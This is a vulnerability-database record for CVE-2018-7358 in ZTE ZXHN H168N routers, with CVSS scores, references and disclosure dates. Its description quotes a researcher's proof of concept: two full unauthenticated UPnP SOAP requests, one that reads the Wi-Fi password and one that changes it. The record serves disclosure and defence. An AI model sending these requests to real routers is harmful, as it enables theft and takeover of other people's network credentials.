            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT",
            "author": "psirt@zte.com.cn",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.8,
            "id": "CVE-2018-7358",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2018-7358",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "psirt@zte.com.cn",
            "id": "CVE-2018-7358",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2018-7358",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201811-445",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-137390",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-137390"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-012683"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201811-445"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-7358"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-7358"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations. ZTE ZXHN H168N The product contains authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZTE ZXHN H168N is prone to an authorization-bypass vulnerability. \nZTE ZXHN H168N versions 2.2.0_PK1.2T5, 2.2.0_PK1.2T2, 2.2.0_PK11T7 and 2.2.0_PK11T are vulnerable. ZTE ZXHN H168N is China\u0027s ZTE Corporation ( ZTE ) company\u2019s a wireless VDSL router.  ZTE ZXHN H168N There are security holes in . The following versions are affected: ZTE ZXHN H168N V2.2.0_PK1.2T5 Version, V2.2.0_PK1.2T2 Version, V2.2.0_PK11T7 Version, V2.2.0_PK11T Version. [*] POC: (CVE-2018-7357 and CVE-2018-7358)\n\n\n\n\nDisclaimer: [This POC is for Educational Purposes , I would Not be\n\n\nresponsible for any misuse of the information mentioned in this blog post]\n\n\n\n\n[+] Unauthenticated\n\n\n\n\n[+] Author: Usman Saeed (usman [at] xc0re.net)\n\n\n\n\n[+] Protocol: UPnP\n\n\n\n\n[+] Affected Harware/Software:\n\n\n\n\nModel name: ZXHN H168N v2.2\n\n\n\n\nBuild Timestamp: 20171127193202\n\n\n\n\nSoftware Version: V2.2.0_PK1.2T5\n\n\n\n\n[+] Findings:\n\n\n\n\n1. Unauthenticated access to WLAN password:\n\n\n\n\nPOST /control/igd/wlanc_1_1 HTTP/1.1\n\n\nHost: \u003cIP\u003e:52869\n\n\nUser-Agent: {omitted}\n\n\nContent-Length: 288\n\n\nConnection: close\n\n\nContent-Type: text/xml; charset=\"utf-8\"\n\n\nSOAPACTION: \"urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys\" 1\n\n\n\n\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n\n\n\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\"\u003e\u003c/u:GetSecurityKeys\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\n\n\n\n\n2. Unauthenticated WLAN passphrase change:\n\n\n\n\nPOST /control/igd/wlanc_1_1 HTTP/1.1\n\n\nHost: \u003cIP\u003e:52869\n\n\nUser-Agent: {omitted}\n\n\nContent-Length: 496\n\n\nConnection: close\n\n\nContent-Type: text/xml; charset=\"utf-8\"\n\n\nSOAPACTION: \"urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys\"\n\n\n\n\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n\n\n\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:SetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\"\u003e\u003cNewWEPKey0\u003e{omitted}\u003c/NewWEPKey0\u003e\u003cNewWEPKey1\u003e{omitted}\u003c/NewWEPKey1\u003e\u003cNewWEPKey2\u003e{omitted}\u003c/NewWEPKey2\u003e\u003cNewWEPKey3\u003e{omitted}\u003c/NewWEPKey3\u003e\u003cNewPreSharedKey\u003e{omitted}\u003c/NewPreSharedKey\u003e\u003cNewKeyPassphrase\u003e{omitted}\u003c/NewKeyPassphrase\u003e\u003c/u:SetSecurityKeys\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\n\n\n\n\n[*] Solution:\n\n\n\n\nUPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices. \n\n\n\n\n[*] Note:\n\n\n\n\nThere are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same. \n\n\n\n\n[+] Responsible Disclosure:\n\n\n\n\nVulnerabilities identified - 20 August, 2018\n\n\n\n\nReported to ZTE - 28 August, 2018\n\n\n\n\nZTE official statement - 17 September 2018\n\n\n\n\nZTE patched the vulnerability - 12 November 2018\n\n\n\n\nThe operator pushed the update - 12 November 2018\n\n\n\n\nCVE published - CVE- 2018-7357 and CVE-2018-7358\n\n\n\n\nPublic disclosure - 12 November 2018\n\n\n\n\nRef: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522\n\n\n\n\n\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-7358"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-012683"
      },
      {
        "db": "BID",
        "id": "105963"
      },
      {
        "db": "VULHUB",
        "id": "VHN-137390"
      },
      {
        "db": "PACKETSTORM",
        "id": "150728"
      }
    ],
    "trust": 2.07
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-7358",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "105963",
        "trust": 2.0
      },
      {
        "db": "ZTE",
        "id": "1009523",
        "trust": 2.0
      },
      {
        "db": "EXPLOIT-DB",
        "id": "45972",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-012683",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201811-445",
        "trust": 0.7
      },
      {
        "db": "VULHUB",
        "id": "VHN-137390",
        "trust": 0.1
      },
      {
        "db": "ZTE",
        "id": "1009522",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "150728",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-137390"
      },
      {
        "db": "BID",
        "id": "105963"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-012683"
      },
      {
        "db": "PACKETSTORM",
        "id": "150728"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201811-445"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-7358"
      }
    ]
  },
  "id": "VAR-201811-0984",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-137390"
      }
    ],
    "trust": 0.47662336000000005
  },
  "last_update_date": "2024-11-23T22:30:10.941000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Improper Authorization Vulnerabilities in ZTE ZXHN H168N Product",
        "trust": 0.8,
        "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
      },
      {
        "title": "ZTE ZXHN H168N Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=86848"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-012683"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201811-445"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-287",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-137390"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-012683"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-7358"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009523"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/105963"
      },
      {
        "trust": 1.7,
        "url": "https://www.exploit-db.com/exploits/45972/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7358"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7358"
      },
      {
        "trust": 0.3,
        "url": "http://www.zte.com.cn/"
      },
      {
        "trust": 0.1,
        "url": "http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009522"
      },
      {
        "trust": 0.1,
        "url": "http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:body\u003e\u003cu:getsecuritykeys"
      },
      {
        "trust": 0.1,
        "url": "http://schemas.xmlsoap.org/soap/envelope/\""
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7357"
      },
      {
        "trust": 0.1,
        "url": "http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:body\u003e\u003cu:setsecuritykeys"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-137390"
      },
      {
        "db": "BID",
        "id": "105963"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-012683"
      },
      {
        "db": "PACKETSTORM",
        "id": "150728"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201811-445"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-7358"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-137390"
      },
      {
        "db": "BID",
        "id": "105963"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-012683"
      },
      {
        "db": "PACKETSTORM",
        "id": "150728"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201811-445"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-7358"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-11-14T00:00:00",
        "db": "VULHUB",
        "id": "VHN-137390"
      },
      {
        "date": "2018-11-15T00:00:00",
        "db": "BID",
        "id": "105963"
      },
      {
        "date": "2019-02-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-012683"
      },
      {
        "date": "2018-12-11T01:49:45",
        "db": "PACKETSTORM",
        "id": "150728"
      },
      {
        "date": "2018-11-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201811-445"
      },
      {
        "date": "2018-11-14T15:29:02.220000",
        "db": "NVD",
        "id": "CVE-2018-7358"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-137390"
      },
      {
        "date": "2018-11-15T00:00:00",
        "db": "BID",
        "id": "105963"
      },
      {
        "date": "2019-02-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-012683"
      },
      {
        "date": "2019-10-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201811-445"
      },
      {
        "date": "2024-11-21T04:12:03.917000",
        "db": "NVD",
        "id": "CVE-2018-7358"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote or local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201811-445"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "ZTE ZXHN H168N Authentication vulnerabilities in products",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-012683"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "authorization issue",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201811-445"
      }
    ],
    "trust": 0.6
  }
}

fkie_cve-2018-7358

Vulnerability from fkie_nvd

Published

2018-11-14 15:29

Modified

2024-11-21 04:12

Severity ?

6.5 (Medium) - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
8.8 (High) - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
psirt@zte.com.cn	http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523	Vendor Advisory
psirt@zte.com.cn	http://www.securityfocus.com/bid/105963	Third Party Advisory, VDB Entry
psirt@zte.com.cn	https://www.exploit-db.com/exploits/45972/	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/105963	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/45972/	Exploit, Third Party Advisory, VDB Entry

Impacted products

Vendor	Product	Version
zte	zxhn_h168n_firmware	2.2.0_pk1.2t2
zte	zxhn_h168n_firmware	2.2.0_pk1.2t5
zte	zxhn_h168n_firmware	2.2.0_pk11t
zte	zxhn_h168n_firmware	2.2.0_pk11t7
zte	zxhn_h168n	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk1.2t2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E3076346-6FE4-4B31-AB9E-5C2D8325C5A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk1.2t5:*:*:*:*:*:*:*",
              "matchCriteriaId": "26C8A530-ECCC-4B66-84A5-F656113DA5A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk11t:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD09C0CB-482C-4777-B2A4-98FA0F327511",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk11t7:*:*:*:*:*:*:*",
              "matchCriteriaId": "AE5DF287-E1D0-47F1-8F1D-842DF1D00019",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:zte:zxhn_h168n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "391EB61C-0A7B-48A6-8BBD-944C848ACD10",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations."
    },
    {
      "lang": "es",
      "value": "El producto ZTE ZXHN H168N en versiones V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 y V2.2.0_PK11T tiene una vulnerabilidad de control de cambios incorrecto, que podr\u00eda permitir que un usuario no autorizado realice acciones no autorizadas."
    }
  ],
  "id": "CVE-2018-7358",
  "lastModified": "2024-11-21T04:12:03.917",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "ADJACENT_NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 6.5,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "ADJACENT_NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "psirt@zte.com.cn",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "ADJACENT_NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-11-14T15:29:02.220",
  "references": [
    {
      "source": "psirt@zte.com.cn",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
    },
    {
      "source": "psirt@zte.com.cn",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/105963"
    },
    {
      "source": "psirt@zte.com.cn",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/45972/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/105963"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/45972/"
    }
  ],
  "sourceIdentifier": "psirt@zte.com.cn",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-287"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2018-7358 (GCVE-0-2018-7358)

Vulnerability from cvelistv5

gsd-2018-7358

Vulnerability from gsd

ghsa-v355-59px-vmmr

Vulnerability from github

var-201811-0984

Vulnerability from variot

fkie_cve-2018-7358

Vulnerability from fkie_nvd

Tags

Sightings

Nomenclature